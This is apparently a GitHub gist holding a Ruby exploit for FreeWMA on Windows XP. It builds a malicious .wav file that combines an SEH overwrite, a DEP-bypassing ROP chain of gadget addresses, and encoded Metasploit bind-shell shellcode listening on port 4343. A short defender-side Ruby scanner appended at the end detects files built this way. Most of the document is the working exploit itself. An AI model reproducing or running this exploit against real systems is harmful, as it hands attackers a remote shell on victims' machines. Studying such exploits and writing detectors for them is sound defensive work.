@mfadzilr
Created November 12, 2014 08:40
FreeWMA SEH DEP Bypass Exploit
#!/usr/bin/env ruby
# encoding: utf-8
# Author : Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Date : 01/11/2014
# Tested on windows xp sp 3 (en)
# Free WMA SEH exploit (DEP Bypass)
seh = 4104        # file offset of the overwritten SEH handler pointer
stackpivot = 88   # file offset where the ROP chain is placed (ESP lands here after the pivot)
buf = "A" * 5000  # filler buffer; ROP chain, payload and SEH record are patched in below
# Metasploit shell bind port 4343
# ./msfvenom -p windows/shell/bind_tcp LHOST=0.0.0.0 LPORT=4343 -e x86/shikata_ga_nai -f ruby
bind_tcp =
"\xd9\xe5\xd9\x74\x24\xf4\xba\xee\xb9\x13\x76\x5b\x31\xc9" +
"\xb1\x56\x83\xeb\xfc\x31\x53\x14\x03\x53\xfa\x5b\xe6\x8a" +
"\xea\x15\x09\x73\xea\x45\x83\x96\xdb\x57\xf7\xd3\x49\x68" +
"\x73\xb1\x61\x03\xd1\x22\xf2\x61\xfe\x45\xb3\xcc\xd8\x68" +
"\x44\xe1\xe4\x27\x86\x63\x99\x35\xda\x43\xa0\xf5\x2f\x85" +
"\xe5\xe8\xdf\xd7\xbe\x67\x4d\xc8\xcb\x3a\x4d\xe9\x1b\x31" +
"\xed\x91\x1e\x86\x99\x2b\x20\xd7\x31\x27\x6a\xcf\x3a\x6f" +
"\x4b\xee\xef\x73\xb7\xb9\x84\x40\x43\x38\x4c\x99\xac\x0a" +
"\xb0\x76\x93\xa2\x3d\x86\xd3\x05\xdd\xfd\x2f\x76\x60\x06" +
"\xf4\x04\xbe\x83\xe9\xaf\x35\x33\xca\x4e\x9a\xa2\x99\x5d" +
"\x57\xa0\xc6\x41\x66\x65\x7d\x7d\xe3\x88\x52\xf7\xb7\xae" +
"\x76\x53\x6c\xce\x2f\x39\xc3\xef\x30\xe5\xbc\x55\x3a\x04" +
"\xa9\xec\x61\x41\x1e\xc3\x99\x91\x08\x54\xe9\xa3\x97\xce" +
"\x65\x88\x50\xc9\x72\xef\x4b\xad\xed\x0e\x73\xce\x24\xd5" +
"\x27\x9e\x5e\xfc\x47\x75\x9f\x01\x92\xda\xcf\xad\x4c\x9b" +
"\xbf\x0d\x3c\x73\xaa\x81\x63\x63\xd5\x4b\x12\xa3\x1b\xaf" +
"\x77\x44\x5e\x4f\x67\x63\xd7\xa9\xed\x9b\xbe\x62\x99\x59" +
"\xe5\xba\x3e\xa1\xcf\x96\x97\x35\x47\xf1\x2f\x39\x58\xd7" +
"\x1c\x96\xf0\xb0\xd6\xf4\xc4\xa1\xe9\xd0\x6c\xab\xd2\xb3" +
"\xe7\xc5\x91\x22\xf7\xcf\x41\xc6\x6a\x94\x91\x81\x96\x03" +
"\xc6\xc6\x69\x5a\x82\xfa\xd0\xf4\xb0\x06\x84\x3f\x70\xdd" +
"\x75\xc1\x79\x90\xc2\xe5\x69\x6c\xca\xa1\xdd\x20\x9d\x7f" +
"\x8b\x86\x77\xce\x65\x51\x2b\x98\xe1\x24\x07\x1b\x77\x29" +
"\x42\xed\x97\x98\x3b\xa8\xa8\x15\xac\x3c\xd1\x4b\x4c\xc2" +
"\x08\xc8\x7c\x89\x10\x79\x15\x54\xc1\x3b\x78\x67\x3c\x7f" +
"\x85\xe4\xb4\x00\x72\xf4\xbd\x05\x3e\xb2\x2e\x74\x2f\x57" +
"\x50\x2b\x50\x72"
sc = bind_tcp.force_encoding("utf-8")
rop_gadgets =
[
0x004717fe, # POP ECX # RETN [Wmpcon.exe]
0x77c11120, # ptr to &VirtualProtect() [IAT msvcrt.dll]
0x00415638, # MOV EDX,DWORD PTR DS:[ECX] # MOV EAX,EDX # RETN [Wmpcon.exe]
0x0042608a, # PUSH EDX # OR AL,5F # POP ESI # POP EBX # RETN
0x00488AAD, # RETN (Filler)
0x004a97a3, # POP EBP # RETN [Wmpcon.exe]
0x004495e9, # & jmp esp [Wmpcon.exe]
0x00488AAD, # RETN (Filler)
0x004504cf, # POP EBX # RETN [Wmpcon.exe]
0x00000201, # 0x00000201-> ebx
0x1002b339, # POP EDX # RETN [lame_enc.dll]
0x00000040, # 0x00000040-> edx
0x100228b6, # POP ECX # RETN [lame_enc.dll]
0x004cfa01, # &Writable location [Wmpcon.exe]
0x1002dcde, # POP EDI # RETN [lame_enc.dll]
0x0040d987, # RETN (ROP NOP) [Wmpcon.exe]
0x1002d95d, # POP EAX # RETN [lame_enc.dll]
0x90909090, # nop
0x004ada2d, # PUSHAD # RETN [Wmpcon.exe]
].flatten.pack("V*").force_encoding("utf-8")
payload = "\x90".force_encoding("utf-8") * 20
payload << sc
buf[stackpivot,rop_gadgets.length] = rop_gadgets
buf[stackpivot+rop_gadgets.length,payload.length] = payload
buf[seh,4] = [0x0040c192].pack('V').force_encoding("utf-8") # add esp,444
begin
# write in binary mode so no newline translation alters the payload bytes
File.open("xgb.wav","wb") do |fp|
fp.write buf
puts "file size: #{buf.length}"
puts "sc size: #{sc.length}"
end # File.open closes the handle when the block ends
rescue Exception => e
puts e
end
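Added here as a defender-side example, not part of the original gist: a Ruby check that flags .wav files carrying the markers the script above writes (the SEH handler value at offset 4104, the ROP chain head at offset 88, the long "A" filler, and the missing RIFF/WAVE header). The constant names, the `scan_wav`/`suspicious?` helpers and the 1024-byte run threshold are my own choices, not anything from the gist.

```ruby
# Offsets and values taken from the exploit script above.
SEH_OFFSET     = 4104        # file offset of the overwritten SEH handler
SEH_HANDLER    = 0x0040c192  # ADD ESP,444 gadget used as the handler
STACKPIVOT_OFF = 88          # file offset where the ROP chain starts
ROP_FIRST      = 0x004717fe  # first gadget: POP ECX # RETN [Wmpcon.exe]
FILLER_RUN_MIN = 1024        # assumed threshold for a suspicious 'A' run

# A real WAV starts with "RIFF", a size dword, then "WAVE".
def valid_riff_wave?(data)
  data.bytesize >= 12 && data.byteslice(0, 4) == "RIFF" && data.byteslice(8, 4) == "WAVE"
end

# Little-endian dword at a file offset, or nil if the file is too short.
def dword_at(data, off)
  return nil if data.bytesize < off + 4
  data.byteslice(off, 4).unpack("V").first
end

# Longest run of one byte value; the exploit file is mostly 'A' (0x41).
def longest_run(data, byte)
  best = cur = 0
  data.each_byte do |b|
    if b == byte
      cur += 1
      best = cur if cur > best
    else
      cur = 0
    end
  end
  best
end

# Returns a list of human-readable findings; empty means nothing matched.
def scan_wav(data)
  data = data.b  # treat as raw bytes regardless of source encoding
  findings = []
  findings << "missing RIFF/WAVE header" unless valid_riff_wave?(data)
  if dword_at(data, SEH_OFFSET) == SEH_HANDLER
    findings << format("SEH handler at %d is 0x%08x", SEH_OFFSET, SEH_HANDLER)
  end
  if dword_at(data, STACKPIVOT_OFF) == ROP_FIRST
    findings << format("ROP chain head at %d is 0x%08x", STACKPIVOT_OFF, ROP_FIRST)
  end
  run = longest_run(data, 0x41)
  findings << "filler run of #{run} 'A' bytes" if run >= FILLER_RUN_MIN
  findings
end

def suspicious?(data)
  !scan_wav(data).empty?
end
```

Run it over a file with `suspicious?(File.binread(path))`; a malformed but harmless file yields only the header finding, while a file built by the script above matches all four.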